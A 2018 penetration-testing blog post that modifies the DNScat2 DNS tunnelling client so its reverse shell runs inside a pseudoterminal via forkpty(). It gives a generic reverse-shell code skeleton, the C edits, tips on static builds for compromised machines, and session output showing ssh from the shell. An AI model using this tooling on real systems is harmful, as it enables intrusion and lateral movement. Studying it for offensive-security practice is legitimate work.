<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Beyond pty.spawn - use pseudoterminals in your reverse shells (DNScat2 example) | Doomsday Vault</title>
<meta name="generator" content="Jekyll v3.9.5" />
<meta property="og:title" content="Beyond pty.spawn - use pseudoterminals in your reverse shells (DNScat2 example)" />
<meta name="author" content="X-C3LL" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Quick article about how to improve well-known tools used in pentests. Forkpty() FTW!!" />
<meta property="og:description" content="Quick article about how to improve well-known tools used in pentests. Forkpty() FTW!!" />
<link rel="canonical" href="http://localhost:4000/posts/2018/05/08/forkpty-dnscat2.html" />
<meta property="og:url" content="http://localhost:4000/posts/2018/05/08/forkpty-dnscat2.html" />
<meta property="og:site_name" content="Doomsday Vault" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2018-05-08T14:00:00+02:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Beyond pty.spawn - use pseudoterminals in your reverse shells (DNScat2 example)" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"X-C3LL"},"dateModified":"2018-05-08T14:00:00+02:00","datePublished":"2018-05-08T14:00:00+02:00","description":"Quick article about how to improve well-known tools used in pentests. Forkpty() FTW!!","headline":"Beyond pty.spawn - use pseudoterminals in your reverse shells (DNScat2 example)","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/2018/05/08/forkpty-dnscat2.html"},"publisher":{"@type":"Organization","logo":{"@type":"ImageObject","url":"http://localhost:4000/assets/img/logo.jpg"},"name":"X-C3LL"},"url":"http://localhost:4000/posts/2018/05/08/forkpty-dnscat2.html"}</script>
<!-- End Jekyll SEO tag -->

    <link rel="stylesheet" href="/assets/css/style.css?v=c27a30cb27997bd3ed45ba5a77bd97bd27cbeb64">
    <!--[if lt IE 9]>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js"></script>
    <![endif]-->
    <!-- start custom head snippets, customize with your own _includes/head-custom.html file -->

<!-- Setup Google Analytics -->



<!-- You can set your favicon here -->
<!-- link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" -->

<!-- end custom head snippets -->

  </head>
  <body>
    <div class="wrapper">
      <header>

        <h1><a href="http://localhost:4000/">Doomsday Vault</a></h1>

        
          <img src="/assets/img/logo.jpg" alt="Logo" />
        

        <p>X-C3LL's Personal Blog :)</p>


        
        <ul class="downloads">
          <li><a href="https://twitter.com/TheXC3LL">@TheXC3LL<strong>Twitter</strong></a></li>
          <li><a href="https://www.linkedin.com/in/thexc3ll/">thexc3ll<strong>LinkedIn</strong></a></li>
          <li><a href="https://mastodon.social/@XC3LL">@XC3LL<strong>Mastodon</strong></a></li>
        </ul>
        
               <nav>
  <ul>
    <li><a href="/">Home</a></li>
  <li><a href="/about.html">About</a></li>
    <li><a href="/cves.html">CVEs</a></li>
    <li><a href="/tools.html">Tools</a></li>
    <li><a href="/stuff.html">Slides & Articles</a></li>
  <li><a href="/rss.xml">RSS</a>/<a href="/atom.xml">Atom</a></li>
  
</ul>
</nav>
      </header>
      <section>

      <small>8 May 2018</small>
<h1>Beyond pty.spawn - use pseudoterminals in your reverse shells (DNScat2 example)</h1>


<p>        
Something that boils me since few years ago is the fashion of using “pty.spawn” and similar tricks to get a pseudoterminal. You does not always have python installed in the machine that you just compromised, so if you are going to drop a custom binary in that machine there is no reason to not to do the things “well”. Without a pty, stuff like doing a ssh to other server, using sudo, vim, etc. is a pain in the ass. Of course there are tons of tricks to solve this issues, but it is far better if we can avoid to use external help. We can run a child process inside a pseudoterminal just editing few lines. In this post we are going to edit a well-known tool <a href="https://github.com/iagox86/dnscat2">DNSCat2</a> in order to obtain a shell inside a pty.</p>

<h2 id="from-fork-to-forkpty">From fork() to forkpty()</h2>

<p>        
Almost every tool or code snippet used to obtain a reverse shell uses a similar skeleton that we can simplify to something like this:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">...</span>
<span class="n">pid</span> <span class="o">=</span> <span class="n">fork</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
	<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"F*cked!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>

<span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Child process...</span>
	<span class="c1">//Magic is a socket, a pipe, whatever...</span>
	<span class="n">dup2</span><span class="p">(</span><span class="n">magic</span><span class="p">,</span> <span class="n">STDIN_FILENO</span><span class="p">);</span>
	<span class="n">dup2</span><span class="p">(</span><span class="n">magic</span><span class="p">,</span> <span class="n">STDOUT_FILENO</span><span class="p">);</span>
	<span class="n">dup2</span><span class="p">(</span><span class="n">magic</span><span class="p">,</span> <span class="n">STDERR_FILENO</span><span class="p">);</span>
	<span class="n">execlp</span><span class="p">(</span><span class="s">"/bin/sh"</span><span class="p">,</span> <span class="s">"pwned"</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
	<span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">//Daddy's code...</span>
<span class="p">...</span>
</code></pre></div></div>
<p>        
We can use fork() to fork our process and call the /bin/sh binary, or we can call the cool <strong>forkpty()</strong>. Forkpty() is where all the magic lies:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DESCRIPTION
  The openpty() function finds an available pseudoterminal and returns file descriptors for the master and slave in amaster and aslave.  If name is not NULL, the filename of the slave is returned in name.  If termp is not NULL, the terminal parameters of the slave will be set to the values in termp.  If
  winp is not NULL, the window size of the slave will be set to the values in winp.

  The login_tty() function prepares for a login on the terminal fd (which may be a real terminal device, or the slave of a pseudoterminal as returned by openpty()) by creating a new session, making fd the controlling terminal for the calling process, setting fd to be  the  standard  input,  output,  and
  error streams of the current process, and closing fd.

  The  forkpty()  function  combines openpty(), fork(2), and login_tty() to create a new process operating in a pseudoterminal.  The file descriptor of the master side of the pseudoterminal is returned in amaster, and the filename of the slave in name if it is not NULL.  The termp and winp arguments, if
  not NULL, will determine the terminal attributes and window size of the slave side of the pseudoterminal.
</code></pre></div></div>
<p>        
So if we use forkpty(), when we do our execlp(“/bin/sh”…) the shell process will be run inside a pseudoterminal. No more pty.spawn, expect, script, stty…</p>

<h2 id="improving-dnscat2">Improving DNScat2</h2>
<p>        
It is the moment to put our hands dirty. Download the code from github (https://github.com/iagox86/dnscat2/ ) and vim the file <strong>client/drivers/driver_exe.c</strong>.</p>

<p>        
First we are going to add the includes needed:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">...</span>
<span class="cp">#include</span> <span class="cpf">&lt;pty.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;termios.h&gt;</span><span class="cp">
</span><span class="p">...</span>
</code></pre></div></div>
<p>        
Search the line <code class="language-plaintext highlighter-rouge">driver-&gt;pid = fork();</code> and edit it to use forkpty() (the original code is commented):</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/*driver-&gt;pid = fork();*/</span>  
   <span class="kt">int</span> <span class="n">terminalfd</span><span class="p">;</span> <span class="c1">// We are going to read &amp; write to our child through it</span>

   <span class="n">driver</span><span class="o">-&gt;</span><span class="n">pid</span> <span class="o">=</span> <span class="n">forkpty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">terminalfd</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span> 
   <span class="k">if</span><span class="p">(</span><span class="n">driver</span><span class="o">-&gt;</span><span class="n">pid</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
   <span class="p">{</span>  
<span class="n">LOG_FATAL</span><span class="p">(</span><span class="s">"exec: couldn't create process (%d)"</span><span class="p">,</span> <span class="n">errno</span><span class="p">);</span>    
<span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
   <span class="p">}</span>  

   <span class="cm">/* If we're in the child process... */</span>    
   <span class="k">if</span><span class="p">(</span><span class="n">driver</span><span class="o">-&gt;</span><span class="n">pid</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
   <span class="p">{</span>  
<span class="cm">/* Copy the pipes.
if(dup2(driver-&gt;pipe_stdin[PIPE_READ], STDIN_FILENO) == -1)
  nbdie("exec: couldn't duplicate STDIN handle");   

if(dup2(driver-&gt;pipe_stdout[PIPE_WRITE], STDOUT_FILENO) == -1)  
  nbdie("exec: couldn't duplicate STDOUT handle");  

if(dup2(driver-&gt;pipe_stdout[PIPE_WRITE], STDERR_FILENO) == -1)  
  nbdie("exec: couldn't duplicate STDERR handle");  

 Execute the new process.
  */</span>  
<span class="n">execlp</span><span class="p">(</span><span class="s">"/bin/sh"</span><span class="p">,</span> <span class="s">"sh"</span><span class="p">,</span> <span class="s">"-c"</span><span class="p">,</span> <span class="n">driver</span><span class="o">-&gt;</span><span class="n">process</span><span class="p">,</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span> <span class="nb">NULL</span><span class="p">);</span>   

<span class="cm">/* If execlp returns, bad stuff happened. */</span>   
<span class="n">LOG_FATAL</span><span class="p">(</span><span class="s">"exec: execlp failed (%d)"</span><span class="p">,</span> <span class="n">errno</span><span class="p">);</span>  
<span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
   <span class="p">}</span>  
</code></pre></div></div>
<p>        
We need to add our “terminalfd” to the “driver” structure:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* Add the sub-process's stdout as a socket. */</span>      
   <span class="cm">/*      
   select_group_add_socket(driver-&gt;group, driver-&gt;pipe_stdout[PIPE_READ], SOCKET_TYPE_STREAM, driver);        
   select_set_recv(driver-&gt;group,driver-&gt;pipe_stdout[PIPE_READ], exec_callback);   
   select_set_closed(driver-&gt;group,       driver-&gt;pipe_stdout[PIPE_READ], exec_closed_callback);     
  */</span>       
  
   <span class="k">struct</span> <span class="n">termios</span> <span class="n">terminal</span><span class="p">;</span>  
   <span class="n">tcgetattr</span><span class="p">(</span><span class="n">terminalfd</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">terminal</span><span class="p">);</span>  <span class="c1">// Get the attributes to change few of them</span>
   <span class="n">terminal</span><span class="p">.</span><span class="n">c_lflag</span> <span class="o">&amp;=</span> <span class="o">~</span><span class="n">ECHO</span><span class="p">;</span> 
   <span class="n">terminal</span><span class="p">.</span><span class="n">c_lflag</span> <span class="o">&amp;=</span> <span class="o">~</span><span class="n">ICANON</span><span class="p">;</span>  
   <span class="n">tcsetattr</span><span class="p">(</span><span class="n">terminalfd</span><span class="p">,</span> <span class="n">TCSANOW</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">terminal</span><span class="p">);</span>  <span class="c1">// Set again the attributes</span>
  
   <span class="n">driver</span><span class="o">-&gt;</span><span class="n">pipe_stdout</span><span class="p">[</span><span class="n">PIPE_READ</span><span class="p">]</span> <span class="o">=</span>  <span class="n">terminalfd</span><span class="p">;</span> <span class="c1">// Use it to read the output of our child  </span>
   <span class="n">driver</span><span class="o">-&gt;</span><span class="n">pipe_stdin</span><span class="p">[</span><span class="n">PIPE_WRITE</span><span class="p">]</span> <span class="o">=</span> <span class="n">terminalfd</span><span class="p">;</span> <span class="c1">// Use it to write to the input of our child </span>
  
   <span class="n">select_group_add_socket</span><span class="p">(</span><span class="n">driver</span><span class="o">-&gt;</span><span class="n">group</span><span class="p">,</span> <span class="n">driver</span><span class="o">-&gt;</span><span class="n">pipe_stdout</span><span class="p">[</span><span class="n">PIPE_READ</span><span class="p">],</span> <span class="n">SOCKET_TYPE_STREAM</span><span class="p">,</span> <span class="n">driver</span><span class="p">);</span>        
   <span class="n">select_set_recv</span><span class="p">(</span><span class="n">driver</span><span class="o">-&gt;</span><span class="n">group</span><span class="p">,</span><span class="n">driver</span><span class="o">-&gt;</span><span class="n">pipe_stdout</span><span class="p">[</span><span class="n">PIPE_READ</span><span class="p">],</span> <span class="n">exec_callback</span><span class="p">);</span>   
   <span class="n">select_set_closed</span><span class="p">(</span><span class="n">driver</span><span class="o">-&gt;</span><span class="n">group</span><span class="p">,</span>       <span class="n">driver</span><span class="o">-&gt;</span><span class="n">pipe_stdout</span><span class="p">[</span><span class="n">PIPE_READ</span><span class="p">],</span> <span class="n">exec_closed_callback</span><span class="p">);</span>     
</code></pre></div></div>

<p>        
Lastly we need to add the flags -static (if we want a static compilation just ready to work when it is dropped in a compromised machine) and -lutil to link the libraries needed.</p>

<p>        
 <code class="language-plaintext highlighter-rouge">make</code>. Et voilà!</p>

<p>        
When we try to ssh other server using the original version (just download from github and compile), we see the next error message:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>command (localhost.localdomain) 1&gt; window -i 2
New window created: 2
history_size (session) =&gt; 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!

That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!

To go back, type ctrl-z.

sh (localhost.localdomain) 2&gt; ssh harlock@localhost
sh (localhost.localdomain) 2&gt; Pseudo-terminal will not be allocated because stdin is not a terminal.

sh (localhost.localdomain) 2&gt; 
</code></pre></div></div>

<p>        
With our modified version, everything works like a charm:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>command (localhost.localdomain) 1&gt; window -i 2
New window created: 2
history_size (session) =&gt; 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!

That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!

To go back, type ctrl-z.

sh-4.2$
sh (localhost.localdomain) 2&gt; ssh harlock@localhost
sh (localhost.localdomain) 2&gt; harlock@localhost's password: FunkyPassword
sh (localhost.localdomain) 2&gt;
Last login: Wed May  9 09:21:41 2018

[harlock@localhost]-&gt;~ ⌚ 13:58:48
</code></pre></div></div>

<p>        
Nice :)!</p>

<h2 id="final-words">Final words</h2>

<p>        
We used DNSCat2 as example because it is a really cool project. You can extrapolate the modus operandi and use it in other projects.
As I always say, if you find any typo or wanna comment something, feel free to reach me at twitter <a href="https://twitter.com/TheXC3LL">@TheXC3LL</a></p>




      </section>
      <footer>
        
        <p>This project is maintained by <a href="https://github.com/pages-themes">pages-themes</a></p>
        
        <p><small>Hosted on GitHub Pages &mdash; Theme by <a href="https://github.com/orderedlist">orderedlist</a></small></p>
      </footer>
    </div>
    <script src="/assets/js/scale.fix.js"></script>
  </body>
</html>
